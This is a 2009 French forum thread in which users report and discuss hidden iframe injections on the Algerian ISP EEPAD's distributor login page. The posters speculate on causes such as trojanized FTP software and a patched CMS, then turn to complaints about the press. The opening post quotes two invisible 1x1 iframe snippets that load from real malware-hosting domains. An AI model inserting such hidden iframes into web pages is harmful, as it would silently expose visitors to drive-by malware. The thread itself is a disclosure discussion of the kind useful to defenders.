Le site assila.net (EEPAD) infecté par une injection de iframe

[assilabox]

Salam,

 

Suite au blackout eepadien de cette nuit, je me suis amusé a naviguer sur les sites d'eepad ...

 

Surprise! Une page du site www.assila.net (http://www.asila.net/distributeur.asila.net/index.php) est infectée par deux liens vers des sites malveillants.

 

La page infectée n'est ni moins ni plus que la page d'authentification des distributeurs d'eepad, ces derniers peuvent renouveler les abonnements des clients et accéder a la base de données clientèle de EEPAD, ce qui rend la faille infiniment grave!

 

Voici le code qu'on peut trouver sur cette page:

 

src="http://thedeadpit.com/?click=1923906"width=1 height=1 style="visibility:hidden;position:absolute">

src="http://internetcountercheck.com/?click=2834203" width=1 height=1 style="visibility:hidden;position:absolute">

Il s'agit, d'une tentative d'injection d'un logiciel ou code malveillant, les deux iframes tentent d'infecter tous les visiteurs qui consultent la page d'authentification des distributeurs d'eepad ou de détourner leurs requêtes d'authentification vers les sites : thedeadpit.com et internetcountercheck.com qui sont sur la blacklist de Google:

 

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=fr&site=http://thedeadpit.com/

 

 

Ce site est considéré comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.

 

Parmi les programmes malveillants figuraient 35 trojan(s). En moyenne, l'infection a généré 0 nouveaux processus sur l'ordinateur cible.

This site was hosted on 257 network(s) including AS8708 (RDSNET), AS7132 (SBIS), AS30890 (EVOLVA).

 

 

 

Ce site a hébergé des programmes malveillants au cours des 90 derniers jours. Il a infecté 57 domaine(s), dont ncclassifiedonline.net/, rehberweb.com.tr/, el7ooob.com/.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=fr&site=http://internetcountercheck.com/

 

Ce site est considéré comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.

 

 

Parmi les programmes malveillants figuraient 5 trojan(s). En moyenne, l'infection a généré 0 nouveaux processus sur l'ordinateur cible. This site was hosted on 199 network(s) including AS8708 (RDSNET), AS9143 (AtHome Benelux BV), AS30890 (EVOLVA).

 

 

Ce site a hébergé des programmes malveillants au cours des 90 derniers jours. Il a infecté 10 domaine(s), dont prsena.com/, shayarinsms.com/, 140mp3.com/.

Je ne veux pas critiquer eepad ni polémiquer (j'en ai plus qu'assez) et vous demande de ne pas le faire aussi, ça ne sert a rien!

 

Je préfère que nous restions objectifs et que nous nous posions des questions sur la vulnérabilité elle même; ça nous aidera peut être a éviter ce genre d'attaque sur nos sites. Pensez vous que ça soit un ver qui se propage automatiquement? mais dans ce cas pourquoi il se trouverait uniquement sur la page d'authentification des distributeurs!

 

Dans le cas contraire (attaque ciblée) quelle est intérêt de internetcountercheck.com et thedeadpit.com a prendre la main sur le contenu de cette page? ou s'agirait-il d'outils de piratage hébergés sur ces sites qui permettaient a de tiers personnes de s'accaparer des comptes?

 

Plusieurs sites ont été déjà infectés par cette même vulnérabilité ce qui me laisse dire que c'est plutôt un Ver qui se propage automatiquement, mais pourquoi il a touché uniquement cette page du site assila? le répertoire /distributeur.asila.net/ est vulnérable?

 

A vous!

Modifié le 26 février 2009 par assilabox

[SecDz]

A première vue c'est des injections auto de sites vulnérables. Mais je ne connais pas quel service ou quel rôle joue ces "distributeurs" d'Eepad.

 

Si c'est ciblé, c'est pluôt un "offre de service" de ce site (dans l'iframe) au "attaquants" intéressés par le service d'Eepad.

[assilabox]

A première vue c'est des injections auto de sites vulnérables. Mais je ne connais pas quel service ou quel rôle joue ces "distributeurs" d'Eepad.

 

Si c'est ciblé, c'est pluôt un "offre de service" de ce site (dans l'iframe) au "attaquants" intéressés par le service d'Eepad.

 

Les distributeurs d'EEPAD c'est ce que appel eepad les Cybers partenaires, en cherchant sur le site assila.net je tombe sur la liste des Cybers partenaires et je tombe encore sur une page vulnérable!

 

Une autre page du même service est infectée! il s'agit de la page http://www.assila.net/cyber_partenaire.html

 

Curieux! Non?

 

Affaire a suivre...

[Zving]

waw je click sur le lien que ta donner assila et je tombe sur sa :

 

[ktalgerie]

chez toutes les sociétés visité, et ou j'ai eu à intervenir, la cause est:

 

l'utilisation de logiciel pour le transfert ftp professionnel et le ifram est dans le patch.

il ajoute automatiquement le ifram aux fichiers php envoyé sur le serveur lors de l'upload.

 

en ce qui concerne les société de presse écrites arabophones, c'etait un cms vivvo , il y avait une version patché avec un trojan a l'interieur qui fait cela.

 

A noter, qu'il vaut mieux ne pas prendre contact avec la victime, si non on a des problèmes.

c'est ce qui m'est arrivé, lors de la dernière vague sur les sites de la presse écrite arabophone.

 

il parait que c'est moi qui fait cela , et puis je téléphone pour gagner de l'argent.

"paroles d'un très haut responsable chargé de la cyber criminalité en Algérie".

 

mais quand je vois le webmaster de zataz aller presque en prison pour avoir alerter une société je m'attend a encore plus en Algérie.

 

n'importe quoi......

[assilabox]

Salam,

 

Effectivement Zving, voila ce que j'ai lorsque j'utilise Google Chrome:

 

[assilabox]

chez toutes les sociétés visité, et ou j'ai eu à intervenir, la cause est:

 

l'utilisation de logiciel pour le transfert ftp professionnel et le ifram est dans le patch. il ajoute automatiquement le ifram aux fichiers php envoyé sur le serveur lors de l'upload.

 

Ce qui expliquerait la chose, la personne chargée de la partie "distributeurs" dans le site web utiliserait un logiciel de FTP cra-cké ... et pourtant filezilla ou autres existent!

 

en ce qui concerne les société de presse écrites arabophones, c'etait un cms vivvo , il y avait une version patché avec un trojan a l'interieur qui fait cela.

 

A noter, qu'il vaut mieux ne pas prendre contact avec la victime, si non on a des problèmes. C'est ce qui m'est arrivé, lors de la dernière vague sur les sites de la presse écrite arabophone.

 

il parait que c'est moi qui fait cela , et puis je téléphone pour gagner de l'argent."paroles d'un très haut responsable chargé de la cyber criminalité en Algérie".

 

C'est triste!

[SecDz]

Ce qui me dérange le plus dans ces hitoires de hack, c'est le manque de réactivité.

 

On peut comprendre qu'on a fait une "erreur" ce qui a comme résultat la compromission du site par exemple. Mais, ne pas détecter ça après des jours et ne pas réagir 'es vraiment grave.

 

Alors Eepad (le PDG), avant de parler de cybercriminalité et donner des conseils au autres, nettoyez de grace devant votre porte !!

 

Si j'étais AT ou un autre ISP, je ferais un petit article dans se sens avec mes "amis" journalistes

[ktalgerie]

bien dit pour les journalistes, même ceux qui travaillent en algérie à partir du canada."il se reconaitra".

Dans le domaine des tic c'est un clan fermé qui se partagent les cadeaux des majors, à noter que cadeau peut être un paquet de marlboro.........".

Il n y a rien a attendre d'eux, et je pèse mes mots, soit ils signent un papier qui leur a été envoyé tous prêt, soit ils écrivent un papier bidon, pour mettre à la fin "comme le site algérien ..qu'il faut visiter d'urgence..." et en fin, soit ils vont sur internet et jouent du controle-V puis controle-C.

Dans la presse arabophone, les pro des tic sont quasiment inexistant, c'est généralement du copier coller.

 

et pour finir, je vais vous raconter une histoire vraie:

 

invité, moi et ma femme par l'ambassadeur de Pologne à une soirée qui était couverte par la presse, il y avait un buffet et ensuite des intervenants parlaient.

on était assis et derrière moi, il y avait une jeune journaliste qui parlait au téléphone, "on entendais tout" moi et ma femme.

"allo....allo....passez moi la rédaction.....ya djedeeeeeek....tu a raté.....youuuuuuu.......wahed el gato.......ma nahkilekch............."

la journaliste , a passé une demi heure au mobile à énumérer les gâteaux, le poisson et le jus sans alcool, qui a été précisé maintes fois par l'ambassadeur.

 

ce soir la, j'ai appris beaucoup sur la presse algérienne.

et je connais pratiquement tous les journalistes pseudo"TIC" de tous les journaux.

MAKANE WALOU

[SecDz]

ce soir la, j'ai appris beaucoup sur la presse algérienne.

et je connais pratiquement tous les journalistes pseudo"TIC" de tous les journaux.

MAKANE WALOU

 

Ta boite ne fera jamais la couverture d'aucun journal....t'es grillé

[ktalgerie]

je n'est plus de boite, j'ai changé de statut.

je suis grillé depuis 2004.

[smed79]

A noter, qu'il vaut mieux ne pas prendre contact avec la victime, si non on a des problèmes....

je partage votre avis moi aussi j'ai eu des problemes un jour j'ai cru que sa ce passe comme au cinema... mais non en est les premier a etre accuser

 

Modifié le 23 mars 2009 par smed79
kaspersky update

[assilabox]

Salam,

 

C'est pour cela que je ne fais ca que dans l'anonymat!

 

Au passage, le site EEPAD est toujours infecté.

Modifié le 20 mars 2009 par assilabox